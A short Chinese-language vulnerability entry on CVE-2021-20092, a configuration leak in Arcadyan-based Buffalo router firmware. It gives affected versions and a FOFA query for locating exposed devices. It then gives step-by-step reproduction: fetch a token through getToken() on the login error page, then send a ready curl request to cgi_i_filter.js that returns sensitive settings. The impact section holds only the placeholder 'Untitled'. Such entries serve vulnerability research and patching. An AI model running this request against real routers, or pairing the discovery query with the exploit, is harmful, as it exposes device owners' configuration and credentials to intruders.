Arcadyan固件 cgi_i_filter.js 配置信息泄漏漏洞 CVE-2021-20092

漏洞描述

Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面没有正确限制未经授权的参与者对敏感信息的访问。

漏洞影响

Untitled

FOFA

app="Arcadyan-httpd-1.0"

漏洞复现

登录页面

输入任意密码跳转到 loginerror.html 页面，使用 console 调用 getToken() 获取重要参数

_tn 参数设置为刚刚获取到的参数, 使用curl 发送请求包获取敏感信息

curl --include "<http://xxx.xxx.xxx.xxx/cgi/cgi_i_filter.js?_tn=348876758>" -H "Referer: <http://xxx.xxx.xxx.xxx/loginerror.html>"